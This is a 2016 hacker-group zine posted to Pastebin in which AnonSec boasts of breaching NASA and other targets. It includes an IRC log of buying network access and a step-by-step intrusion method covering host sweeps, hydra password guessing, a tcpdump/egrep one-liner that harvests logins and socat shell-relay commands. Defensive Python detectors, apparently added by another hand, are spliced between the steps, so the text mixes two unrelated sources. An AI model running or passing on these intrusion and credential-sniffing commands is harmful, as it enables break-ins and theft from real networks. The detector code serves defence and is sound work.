Pastebin paste by a guest, Apr 19th, 2016
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Version: OpNasaDrones
pub 4096R/4AAE63E0 2015-10-01
Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0
uid AnonSec (Nihil Verum Est Omnia Licita) <An0nsec@protonmail.ch>

[ASCII-art "ANONSEC" banner; column alignment lost in extraction]

4c 61 75 67 68 69 6e 67 41 74 59 6f 75 72 53 65 63 75 72 69 74 79 53 69 6e 63 65 32 30 31 32

[ASCII-art image; column alignment lost in extraction]
#AnonSec
/dev/null before dishonour



BEWARE OF RANTS, RICKTROLLING AND ROOTKITS

+------------------------------------+
| Table of Contents                  |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| 0x00 - Preface                     |
| 0x01 - FLASH FROM THE PAST         |
| 0x02 - TTP(Tech/Tac/Pro)           |
| 0x03 - NASA Missions&Aircraft      |
| 0x04 - Chemtrails/CS/GE/WM         |
| 0x05 - WHATS A ROOTKIT?            |
| 0x06 - Russian Roulette            |
| 0x07 - Epilogue                    |
+------------------------------------+




> 0x00 - Preface


"Look, the people you are after are the people you depend on. We cook your meals,
we haul your trash, we connect your calls, we drive your ambulances. We guard you
while you sleep. DO NOT... FUCK WITH US."


Well here we are, it's 2015/2016 and shit has gotten weird... like "No more secrets Marty" weird.
But if there is one thing our team has learned over the past years, it's that no one has
impermeable OpSec, not even the NSA or GCHQ, e.g. Snowden leaks, ICWATCH, NSA Playset, etc...

Basically, people will ALWAYS be the biggest vulnerability in any networked system.
With that being said, we want to take the time to thank all baby boomer secretaries
world-wide, without your lack of training and irresistible urge to open attachments in
spoofed emails from the HR department, this would have never happened lol // Gozi ftw ᕙ༼ ,,ԾܫԾ,, ༽ᕗ

+==================================================================================+


[ASCII-art sign: "NO SKIDS ALLOWED BEYOND THIS POINT"; column alignment lost in extraction]


For those who don't know us, AnonSec was created in Nov 2011 by MrLele (a former AnonGhost admin,
now Peshmerga sniper) and AnonSec666 (US python programmer). Since our start with two members from
Kurdistan and USA, we have come a long way, adding members and associates from the UK, Germany,
Japan, Malaysia, Morocco, Indonesia, India, Pakistan, Iraq, Italy, Romania and even Latvia. //shouts to CWA, LizardSquad & TeaMp0isoN || rip alg0d
Here are just a few Operations we either started or were heavily involved in...

==> #OpNasaDrones == hacked NASA's drone servers and exfiltrated mission data; vid/data logs [possibly prove existence of Chemtrails and their global warming effect (also their bad OpSec of course)]
e.g. - http://anonhq.com/anonsec-hacked-drone/
- https://www.cyberguerrilla.org/blog/anonymous-operation-nasa-drones-anonsec/
- http://cyberwarzone.com/anonsec-hackers-claim-hacked-nasa-drones/
==> #OpBeast/OpNullDenmark == after DDoSing, defacing or rm -rf / hundreds of bestiality sites, Denmark finally changed their laws
- http://www.mirror.co.uk/news/technology-science/technology/anti-bestiality-hackers-target-vile-dog-5310038
- http://www.techworm.net/2015/04/anonymous-launch-opbeast-against-animal-cruelty-and-depravity.html
- http://www.bbc.co.uk/newsbeat/article/32411241/denmark-passes-law-to-ban-bestiality
==> #OpDetroit == DDoSed servers over the Detroit water shutoffs, also seized a Detroit govt DB and demanded a BTC ransom
- http://www.rt.com/usa/206663-detroit-bitcoin-ransom-database/ // they never mentioned AnonSec even tho a member was v& over it *sigh*
- http://www.techworm.net/2014/11/hackers-encrypted-entire-city-detroit-database-demanded-ransom-2000-bitcoins-803500.html
- http://pastebin.com/raw.php?i=fc5s029B
- http://www.usatoday.com/story/news/nation/2014/08/04/detroit-water-shutoffs/13584027/ // Detroit suspended water shutoffs until August 25th, 1 day after we demanded
==> #OpIsrael == once a year we join in the chaos of fucking raping Israeli cyberspace in protest of the current apartheid #FreePalestine
- https://en.wikipedia.org/wiki/OpIsrael
- https://www.rt.com/news/opisrael-anonymous-final-warning-448/
- https://www.rt.com/news/anonymous-israel-cyber-attack-737/
- https://www.youtube.com/watch?v=Uxy57ofajwE
- https://www.youtube.com/watch?v=uskOcl0OHwY
- https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/anonsec-allegedly-hacks-israel-defense-forces-military-preparatory-school-in-support-of-palestine.html
==> #OpISIS/#OpTerror4ISIS == worked with GhostSec to take down thousands of ISIS Twitter accs, websites and forums
- http://www.techworm.net/2015/04/opisis-anonymous-release-list-of-70-pro-isis-websites-and-14000-of-twitter-ids.html
- http://cyberwarzone.com/anonsec-declares-war-isis-opterror4isis/
- https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/site-1-20-15-anonsec-announces-operation-terror-4-isis-releases-terrorist-group-government-target-list.html
==> #OpDeathEaters == exposed a UK paedophilia network being protected by the political elite
- http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11363303/Anonymous-hackers-turn-fire-on-global-paedophile-menace.html
- http://www.dailydot.com/politics/operation-death-eaters-opdeatheaters-anonymous-pedosadism-prince-andrew/
- http://www.ibtimes.co.uk/opdeatheaters-anonymous-marches-planned-across-uk-us-highlight-global-network-child-abusers-1487867
==> After hacking the Windsor University School of Medicine & leaking DBs, we deleted +$9,000,000 in student loan debt instead of phishing students ^_^
- https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/windsor-university-school-of-medicine-allegedly-hacked-student-database-leaked.html
- https://twitter.com/_d3f4ult/status/651290005793472512
==> And tons of others that were rekt for various reasons
- https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&tagId=658&Itemid=1355
- https://twitter.com/search?q=%40VaraCyber%20Anonsec&src=typd
- http://belsec.skynetblogs.be/archive/2014/11/04/70-000-bitcoin-access-accounts-hacked-at-btc-e-com-and-sold-8318769.html
- http://www.bitdefender.com/security/anonsec-hacking-group-breaches-720-random-sites-worldwide;-mocks-lax-security.html
- http://thecryptosphere.com/2014/10/08/anonsec-hackers-tangodown-turkish-e-commerce-sites/
- http://www.eduicon.com/News/Details/3485.html
- http://www.tech.com.pk/2014/01/720-websites-hacked-and-defaced-by.html
- http://www.meethackers.com/2014/04/mcdonalds-id-leaked-by-anonsec-hackers.html
- http://pastebin.com/qYUeCzNJ
- http://pancasilacyberteam.blogspot.sg/2014/04/1381-email-dibocorkan-oleh-anonsec-dan.html
- http://www.wired.com/2015/11/cia-email-hackers-return-with-major-law-enforcement-breach/
- http://zone-h.org/archive/notifier=AnonSec



Since our inception we have certainly had our 'ups & downs' as you could say, from a core member
getting v&, @MrLele1337 going afk to fight ISIS irl and some even becoming whitehats at tech
companies (Pr3dat0r). However, we are still here laughing at 'security', exposing feds online
& fucking everyone's databases... long dick style (•_•) ( •_•)>⌐■-■ (⌐■_■)
On a more serious note, this is AnonSec's very first zine!
So grab some popcorn and let's get this blood orgy started...


[ASCII-art laptop showing "root@onion.land:~# irssi"; column alignment lost in extraction]



+==================================================================================+
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+==================================================================================+




> 0x01 - FLASH FROM THE PAST


Let's take time to appreciate how this all started 2 years ago...

° ☾ ☆ ¸. ¸  ★  :.  . • ○ ° ★  .   . .  ¸ .   °  ¸. * ● ¸ .
 ...Long ago   ° ☾ °  ¸. ● ¸ .  ★ ° :.  . • °   .  * :. 
• ○ ° ★.in an IRC far, ● ¸     ° ☾ °☆  . * ¸.   ★ ★ ° . . 
.    . ☾ °☆  . * ● far away.......° ☾ ★ °● ¸ .   °  ¸. * ●
.   ★ ° :.  . • ○ ° ★. .  ¸ .  ★ ★ ° . .  ☾ °☆.   °  ¸.



$# /join #64616e74657320696e6665726e6f 4c696d626f
(3:24) == Shimo7even [root@onion.land] has joined #64616e74657320696e6665726e6f
(3:24) -REDACTED- : Finally....
(3:24) * -REDACTED- glares at Shimo7even for being late
(3:25) Shimo7even : br00te told me DA willing to sell access?
(3:25) 鬼佬 : yes, NASA still
(3:26) -REDACTED- : Nothing interesting on this server but it would serve as a good foothold in the network
(3:27) Shimo7even : im listening
(3:27) 鬼佬 : we held several nets for Miami before v&
(3:27) 鬼佬 : we injected our own malware
(3:28) -REDACTED- : pareizs
(3:29) 鬼佬 : we have no idea who else they gave access to
(3:29) 鬼佬 : did +10,000 bot kills just to be safe
(3:29) pangeran : hhhhhhhhhhhhh itu lucu XD XD
(3:30) Bashtien : so how much you guys want?
(3:30) 鬼佬 : -REDACTED-
(3:31) -REDACTED- : So, still think you can afford our services?
(3:31) pangeran : ^^^^^^ hhhhhhhhhhhhhhhhhhh ^^^^^
(3:31) Shimo7even : Afford? That's rich
(3:32) Shimo7even : LoLing@You -REDACTED-
(3:33) Sh1n0d4 : play nice..
(3:34) Bashtien : -REDACTED- we have been sitting on a ton BTC-E accs for a while now..
(3:34) Bashtien : so crypto funds are no problem m8
(3:35) хуй : ^^
(3:35) d3f4ult : We will even tumble the coins multiple times, so they are 100% clean
(3:35) TGab : Those poor Cossaks, ha
(3:37) Shimo7even : BTC or LTC?
(3:37) 鬼佬 : btc
(3:38) 鬼佬 : https://anonfiles.com/file/-REDACTED-REDACTED-REDACTED-REDACTED-
(3:39) Bashtien : cant read the url in the screenshot..
(3:41) -REDACTED- : thats a decoy.. open it in a hex editor, there is a url to a zip containing a txt file with the real backdoor url
(3:41) Sh1n0d4 : that OpSec though lol
(3:43) * TGab crunches popcorn
(3:45) Bashtien : pass?
(3:45) 鬼佬 : 547265616368657279 for both the zip and shell
(3:46) d3f4ult : fuhosin ^_^
(3:49) * Bastien starts a slow clap
(3:50) * TGab drops popcorn all over the floor
(3:50) d3f4ult : Awww, was hoping it was rooted :(
(3:50) -REDACTED- : No but we fingerprinted many outdated systems in the network
(3:51) pangeran : wkwkwkwkwkwkw!!! DA ftw \(^_^)/
(3:51) Sh1n0d4 : well thats good enough for me, wbu shimo?
(3:53) Shimo7even : !sendbtc -REDACTED- -REDACTED-REDACTED-REDACTED-REDACTED-
(3:53) Sh1n0d4 : Well thats a yes haha
(3:53) == ゴールド [~ゴールド@co.in] has joined #64616e74657320696e6665726e6f
(3:53) ゴールド : https://blockchain.info/address/-REDACTED-REDACTED-REDACTED-REDACTED-
(3:54) ゴールド : 送信
(3:55) == ゴールド [~ゴールド@co.in] has quit [Client Quit]
(3:55) -REDACTED- : Pleasure doing business, until next time.
(3:55) 鬼佬 : 谢谢 :)
(3:56) == 鬼佬 [龙@58.87.127.147] has quit [Client Quit]


[>Disclaimer: Certain information was -REDACTED- due to privacy concerns or by request.]




+==================================================================================+
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+==================================================================================+




~~~==+ THE WORLD IS CORRUPT, DON'T BE SHEEP TO THE SLAUGHTER +==~~~
SURVIVE | CONTEMPLATE | INNOVATE




> 0x02 - TTP(Techniques, Tactics & Procedures)


So yeah, we know what you're thinking, hacking NASA? How fucking cliché...
If only I had a Dogecoin for every time someone claimed that, amiright?
It's like the boy who cried wolf but with hacking NASA instead lol
But you might be surprised how low govt security standards can be, especially with a limited
budget and clueless boomers controlling the network. NASA has been breached more times than
most people can honestly remember (our favorites were Gary McKinnon && Mendax's milw0rm)
// you know, when people used to have legit reasons for their hacks^^
Reasons ranged from searching for hidden evidence of UFO technology to protesting the use of uranium-based rocket fuel ^_^


"What the Fuck gives you freedom,
freedom brings opportunity,
opportunity makes your future"


However, this hack into NASA wasn't initially focused on drone data and upper-atmosphere chemical samples.
In fact the original breach into NASA systems wasn't even planned; it was caught up in a Gozi virus spread.
After purchasing our initial foothold, we were just seeing how many machines we could break into, root
and possibly find interesting/profitable data. So Bashtien contacted Dr.d3v1l, an Italian hacker who had recently
hacked and defaced several NASA subdomains. They provided much insight into the common CMSs NASA uses as
well as potential weak spots in their networks.

Since our first shell in NASA systems just had user acc privs, we were fairly limited not only in what
dirs we could access, but also in the commands we could run and the other machines/devices on the network that should have
been visible. Getting root access on this box would be ideal, so that's what we went for.

Unfortunately, this box was running the latest version of Debian and didn't have any (public) local root CVEs,
and we failed to spear phish the root passwd... luckily MA saved the day with his 2014 bypasses & symlink exploits.
With this we were able to simulate root in a new Linux directory and run any command. This allowed us to move tools/utils/modules
(get-pip.py/eggs)/0days to the box as needed [see scp_tools.txt]. scp_tools.txt contains a list of some TTP that were
used to accomplish these hacks; it's best to make a couple of shell scripts for much quicker downloads (scp_tools.sh).


>cat scp_tools.txt
~ Map Network ~
nast -m
reverse-ip lookups
whois & reverse-whois
dirbuster
[MapNet]

~ Scan Ports/Fingerprint/Enumerate ~
unicornscan && onetwopunch.sh
Nmap NSE - NFS - SMB
LinEnum.sh
linuxprivchecker.py
fierce.pl
Bluto
dnswalk
Network Miner

~ Vuln Scanner ~
Linux_Exploit_Suggester.pl
unix-privesc-check
nikto.pl
wpscan.rb
joomscan.pl
uniscan
wapiti
w3af
nipper

~ Bruteforce ~
hydra w/ passwd lists

~ 0days ~
Mauritania Attackers 2014 bypasses & r00t Symlink Exploits
CVE-2013-5065
CVE-2014-0038
WD My Book World Edition SSH root remote enable

~ Packet Capture/Sniffers/Recovery ~
wireshark
tcpdump
dsniff
mimikatz
egrep


// special thanks to Mauritania Attacker for his bypasses & symlink exploit ^_^




"Assume every network you're on is malicious"
- Samy Kamkar




*Mapping a network can be accomplished a million different ways, depending on the type of box your foothold is.
By that we mean: what OS is it, what utils and dependencies does it have already installed, what privileges do
you have, are there any IP restrictions? Once we had a symlinked r00t directory filled with tools, the
real fun began... we started mapping their network.


+=========================================================================+
| Our General Steps for Mapping & Propagating Laterally Through a Network |
+=========================================================================+

1) Once we had access to a box in the network..
[MapNet] Here are just a few simple commands to scan active nodes within a network:
arp
nast -m
ip neigh
AngryIpScanner (has GUI)
arp-scan -l -I eth0
ping -b 192.168.1.255
smbtree -NS 2>/dev/null
nbtscan 192.168.1.1-255
fping -a -g 192.168.1.0/24 2> /dev/null
nmap -sP 192.168.1.0/24 or nmap -sn 192.168.1.0/24
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
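A defender's counterpart to the host-discovery commands above, added here as an example that is not part of the zine: whichever tool is used (fping, arp-scan, nmap -sn, the seq/ping loop), the footprint on the wire is the same, one source touching many distinct destinations in a short window, and that is what a firewall or flow log can be searched for. The log format (`<ISO time> <src> -> <dst> <proto>`), the threshold of 20 hosts per 60 seconds and the sample lines are all constructed assumptions.

```python
"""Flag host-discovery sweeps (ping sweep, arp-scan, nmap -sn, fping ...) in flow logs.

Added example, not from the zine. Log format and thresholds are assumptions.
"""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta


def parse_line(line):
    """Parse one constructed flow-log line: '<ISO time> <src> -> <dst> <proto>'."""
    ts, src, _arrow, dst, proto = line.split()
    return datetime.fromisoformat(ts), src, dst, proto


def detect_sweeps(lines, min_hosts=20, window_s=60):
    """Return {src: peak} for every source that reached at least min_hosts distinct
    destinations inside any window_s-second sliding window.

    Every sweep command in step 1 produces exactly this pattern, whatever the protocol.
    """
    by_src = defaultdict(list)
    for line in lines:
        if line.strip():
            ts, src, dst, _proto = parse_line(line)
            by_src[src].append((ts, dst))

    hits = {}
    window = timedelta(seconds=window_s)
    for src, events in by_src.items():
        events.sort()
        recent = deque()          # (ts, dst) pairs inside the current window
        distinct = Counter()      # dst -> how many recent events touched it
        peak = 0
        for ts, dst in events:
            recent.append((ts, dst))
            distinct[dst] += 1
            while ts - recent[0][0] > window:   # evict events that fell out of the window
                _old_ts, old_dst = recent.popleft()
                distinct[old_dst] -= 1
                if distinct[old_dst] == 0:
                    del distinct[old_dst]
            peak = max(peak, len(distinct))
        if peak >= min_hosts:
            hits[src] = peak
    return hits


def build_sample_log():
    """Constructed sample: a /24 ping sweep from 10.0.5.17 plus ordinary traffic from 10.0.5.40."""
    base = datetime(2016, 4, 19, 3, 24, 0)
    lines = [f"{(base + timedelta(milliseconds=200 * i)).isoformat()} 10.0.5.17 -> 10.0.5.{i} icmp"
             for i in range(1, 255)]
    for i, dst in enumerate(("10.0.5.1", "10.0.5.53", "10.0.5.80")):
        lines.append(f"{(base + timedelta(seconds=5 * i)).isoformat()} 10.0.5.40 -> {dst} tcp")
    return lines


if __name__ == "__main__":
    for src, peak in detect_sweeps(build_sample_log()).items():
        print(f"sweep from {src}: {peak} distinct hosts inside 60s")
```

The sliding window matters more than the raw count: a backup server legitimately talks to every host over a night, a sweep does it in under a minute. Tune `min_hosts` to the subnet size and whitelist known scanners (monitoring, vulnerability management) by source address rather than lowering the threshold.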


2) Next, to get a broader view of their entire network, we started probing whois and reverse-whois lookups on the IP
addresses and domain names we found, as well as registrar info (ex. "222 S Mill Avenue" inurl:domaintools). Also
running Bluto & fierce.pl to find IP leaks via DNS zone transfers. If scans are fruitful with new hosts found, repeat
steps 1&2 on the new addresses. Do this until you can't find any more hosts.

3) Once we started seeing other connected nodes on the same LAN, it was time to run some port scans and do some
passive OS/BIOS fingerprinting. (unicornscan && onetwopunch.sh or nmap NSE scripts come in handy here)

4) After mapping some nodes, scanning ports and fingerprinting, we started looking up CVEs for the different versions
of operating systems and the various services running. (Linux_Exploit_Suggester.pl, unix-privesc-check, nikto.pl,
uniscan and CobaltStrike are the best for automating this process)

5) Any system running RDP/VNC/SSH/MYSQL should always be bruteforced because it's common for administrators to either
leave the default login or to use an extremely common passwd.

> ALWAYS -e nsr WHEN BRUTEFORCING <

+-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
|I|n| |C|o|m|m|o|n|l|y| |u|s|e|d| |P|a|s|s|w|o|r|d|s| |W|e| |T|r|u|s|t|
+-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+

[22][ssh] login: root password: root
1 of 1 target successfully completed, 1 valid password found in 0.32s
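What the hydra run above looks like from the other side of the connection, as an added example that is not from the zine: sshd logs every rejected and accepted password, so a guessing run and, worse, a success following one, can be pulled out of the auth log with a few lines of code. The log lines below are constructed, and the five-failure threshold is an assumption to tune.

```python
"""Spot hydra-style SSH password guessing in sshd syslog output.

Added example, not from the zine. The sample lines below are constructed; the
failure threshold is an assumption.
"""
import re
from collections import defaultdict

# The two sshd messages that matter: a rejected and an accepted password.
SSH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

SAMPLE_AUTH_LOG = """\
Apr 19 03:25:01 web1 sshd[4021]: Failed password for root from 203.0.113.9 port 51234 ssh2
Apr 19 03:25:01 web1 sshd[4022]: Failed password for invalid user admin from 203.0.113.9 port 51235 ssh2
Apr 19 03:25:02 web1 sshd[4023]: Failed password for root from 203.0.113.9 port 51236 ssh2
Apr 19 03:25:02 web1 sshd[4024]: Failed password for invalid user test from 203.0.113.9 port 51237 ssh2
Apr 19 03:25:03 web1 sshd[4025]: Failed password for root from 203.0.113.9 port 51238 ssh2
Apr 19 03:25:03 web1 sshd[4026]: Failed password for invalid user admin from 203.0.113.9 port 51239 ssh2
Apr 19 03:25:04 web1 sshd[4027]: Accepted password for root from 203.0.113.9 port 51240 ssh2
Apr 19 03:31:40 web1 sshd[4101]: Failed password for alice from 198.51.100.4 port 40022 ssh2
Apr 19 03:31:47 web1 sshd[4101]: Accepted publickey for alice from 198.51.100.4 port 40022 ssh2
"""


def analyze_auth_log(lines, threshold=5):
    """Count failed password logins per source and raise two kinds of alert:
    - 'bruteforce' once a source reaches `threshold` failures (the -e nsr style
      root/root, user/user and empty-password guesses land here within seconds);
    - 'success after failures' when that same source is later accepted, which is
      the case that needs an incident response rather than just a block.
    """
    failures = defaultdict(int)
    users = defaultdict(set)
    alerts = []
    for line in lines:
        m = SSH_RE.search(line)
        if not m:
            continue
        outcome, user, src = m.groups()
        if outcome == "Failed":
            failures[src] += 1
            users[src].add(user)
            if failures[src] == threshold:
                alerts.append(f"bruteforce from {src}: {threshold} failures, users tried {sorted(users[src])}")
        elif failures[src] >= threshold:
            alerts.append(f"success after failures from {src}: '{user}' accepted after {failures[src]} failures")
    return {"failures": dict(failures), "alerts": alerts}


if __name__ == "__main__":
    for alert in analyze_auth_log(SAMPLE_AUTH_LOG.splitlines())["alerts"]:
        print(alert)
```

The single failure from 198.51.100.4 followed by a public-key login is an ordinary typo and stays below the threshold. The structural fix is to make the guessing pointless: `PasswordAuthentication no` and `PermitRootLogin no` in sshd_config, plus a rate limiter such as fail2ban for anything that must keep passwords.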


6)* If the site is being used as a public server or for any type of database storage, it will most likely have a
CMS (content management system) with a cpanel. So try running cmsmap.py, wpscan.rb or joomscan.pl.

7)* If the server has any kind of web application on it, try running wapiti and w3af.

8)* If there are any firewalls, switches or routers found in the network, try running nipper (SonicWALL lol).

9) Scanners are great for those of us who are either busy or lazy, but they also tend to generate a lot of false positive results.
One of the most important steps is to use something like dirbuster and manually browse the source of various .xml, .js, .php and
php.ini files for SQLi, XSS, LFI, RFI, FPD, HostHeaderAttacks etc. [this requires decent programming and exploitation knowledge
to spot possible configuration errors, insecure functions or unsanitized inputs, i.e. $_SERVER["HTTP_HOST"], unserialize(),
popen(), strcmp(), exec(), system(), shell_exec(), escapeshellcmd(), passthru(), create_function(), pcntl_exec(), eval()
& many many more!]
Here is an example of NASA SQLi and XSS vulnerabilities:
SQLi: http://prntscr.com/9hekve
XSS: http://prntscr.com/9kkc8r && http://prntscr.com/9kkcnf
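The manual source review in step 9 is the same work a code owner should do before the attacker does, so here is an added example (not from the zine) of the minimal audit pass over the PHP sinks the step lists. It is a line-oriented approximation of a static analyzer: a sink call is "high" when a request-controlled superglobal appears in the same statement, "medium" otherwise, and any use of `$_SERVER['HTTP_HOST']` is reported because the Host header is whatever the client sends. The PHP sample is constructed; the severity scheme is an assumption.

```python
"""Minimal source-audit pass for the PHP sinks listed in step 9.

Added example, not from the zine. The PHP sample is constructed and the
severity scheme is an assumption.
"""
import re

SINKS = ("eval", "exec", "system", "shell_exec", "passthru", "popen",
         "pcntl_exec", "create_function", "unserialize")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")
# Superglobals whose contents the remote client controls.
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")

SAMPLE_PHP = """\
<?php
$link  = $_SERVER['HTTP_HOST'] . "/reset?token=" . $t;  // reset link built from the Host header
$out   = shell_exec("ping -c 1 " . $_GET['ip']);         // request data straight into a shell
$prefs = unserialize($_COOKIE['prefs']);                 // object injection via a cookie
$arg   = escapeshellarg($argv[1]);
system("ls " . $arg);                                    // sink, but the argument was escaped
echo strcmp($a, $b);
"""


def scan_php(source):
    """Return [(line_no, severity, message)] for every finding, in file order."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        code = line.split("//", 1)[0]          # drop trailing line comments (approximation)
        for sink in SINK_RE.findall(code):
            if SOURCE_RE.search(code):
                findings.append((no, "high", f"{sink}() called with request-controlled input"))
            else:
                findings.append((no, "medium", f"{sink}() called; confirm every argument is validated"))
        if "HTTP_HOST" in code:
            findings.append((no, "low", "$_SERVER['HTTP_HOST'] used; compare it against an allowlist of expected hosts"))
    return findings


if __name__ == "__main__":
    for no, severity, msg in scan_php(SAMPLE_PHP):
        print(f"line {no:>3} [{severity:^6}] {msg}")
```

A real pass would track taint across statements rather than one line at a time, but even this much finds the two patterns that matter most in practice: shell sinks fed from `$_GET`/`$_POST`, and `unserialize()` on anything a client can set. The escaped `system()` call still shows up as "medium" on purpose; a reviewer has to confirm the escaping, the tool cannot.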


10)* If that comes up with nothing then it's either brute forcing a login, spear phishing a login with XSS or SEing a login or passwd reset. (hacked VPSs/RDPs, proxies, hydra+wordlists && some burner sims/phones or VoIP servers or hacked Skype accs are a definite must have for this)

11) Always target the most vulnerable nodes first (minus false positives). //They have many WinXP & unpatched Ubuntu servers btw
- WinXP Local SYSTEM privilege escalation: CVE-2013-5065
- Ubuntu Local root exploit: CVE-2014-0038

12) Every time we gained access to a new box we always left a packet sniffer running to hopefully get some http/ftp/smtp/imap/pop3 logins:
tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
ngrep -q -W byline "GET|POST HTTP"
dsniff -m


\!/ ALWaYS RUN SC4NS oN N3W BOXes FOR MORE NoDES \!/


13) Pivoting is great for all kinds of things like bypassing firewalls & getting reverse shells w/ a statically linked copy of socat to drop on the target:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
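Steps 12 and 13 both leave a process behind on the compromised box, and that is where a host-side audit catches them: a capture tool running under an account that has no business sniffing, or socat wiring an interactive shell to a TCP socket. Below is an added example of that check, not from the zine. The input is a constructed process-creation log (`<ISO time> uid=<n> cmd=<command line>`), and the set of uids permitted to run capture tools (here only uid 0, for a monitoring job) is an assumption a site would tune.

```python
"""Endpoint-side detection for steps 12 and 13: sniffers and socat shell relays.

Added example, not from the zine. The process log is constructed and the
trusted-uid set is an assumption.
"""
import os
import re
import shlex

CAPTURE_TOOLS = {"tcpdump", "dsniff", "ngrep"}
TRUSTED_CAPTURE_UIDS = {0}                                   # assumption: only the root monitoring job
# A socat address that runs a shell: exec:bash, exec:'bash -li', exec:/bin/sh ...
SOCAT_SHELL_RE = re.compile(r"exec:['\"]?(?:/bin/)?(?:ba)?sh\b")
# ... paired with a TCP listener or connector gives the bind/reverse shell shape from step 13.
SOCAT_NET_RE = re.compile(r"\btcp[46]?-(?:listen|connect):")
RECORD_RE = re.compile(r"(\S+) uid=(\d+) cmd=(.*)")

SAMPLE_PROCESS_LOG = """\
2016-04-19T03:50:01 uid=0 cmd=tcpdump -i eth0 -w /var/log/capture/daily.pcap
2016-04-19T03:50:07 uid=1001 cmd=socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:4444
2016-04-19T03:51:12 uid=1001 cmd=tcpdump -i eth0 port http or port ftp -l -A
2016-04-19T03:52:00 uid=1001 cmd=socat tcp-listen:8080,fork tcp-connect:10.0.5.80:80
2016-04-19T03:53:30 uid=1001 cmd=ls -la /tmp
"""


def parse_record(line):
    """Parse one constructed record into {'ts', 'uid', 'cmd'}."""
    m = RECORD_RE.match(line)
    if not m:
        raise ValueError(f"unparseable record: {line!r}")
    return {"ts": m.group(1), "uid": int(m.group(2)), "cmd": m.group(3)}


def classify_process(record):
    """Return a finding string for a suspicious process, or None for a benign one."""
    cmd = record["cmd"]
    argv = shlex.split(cmd)
    tool = os.path.basename(argv[0]) if argv else ""
    if tool == "socat" and SOCAT_SHELL_RE.search(cmd) and SOCAT_NET_RE.search(cmd):
        return "socat relaying an interactive shell over TCP (bind/reverse shell pattern)"
    if tool in CAPTURE_TOOLS and record["uid"] not in TRUSTED_CAPTURE_UIDS:
        return f"packet capture tool {tool} started by uid {record['uid']}"
    return None


def audit(lines):
    """Return [(timestamp, finding)] for every suspicious record, in log order."""
    results = []
    for line in lines:
        if not line.strip():
            continue
        record = parse_record(line)
        finding = classify_process(record)
        if finding:
            results.append((record["ts"], finding))
    return results


if __name__ == "__main__":
    for ts, finding in audit(SAMPLE_PROCESS_LOG.splitlines()):
        print(ts, finding)
```

The plain port forward on line four is deliberately left alone: socat has legitimate uses, and it is the `exec:` shell plus a TCP address together that marks the relay. On a real host the records would come from auditd or an EDR agent rather than a text file, and the sniffer check is only as good as the trusted-uid list, so keep that list short.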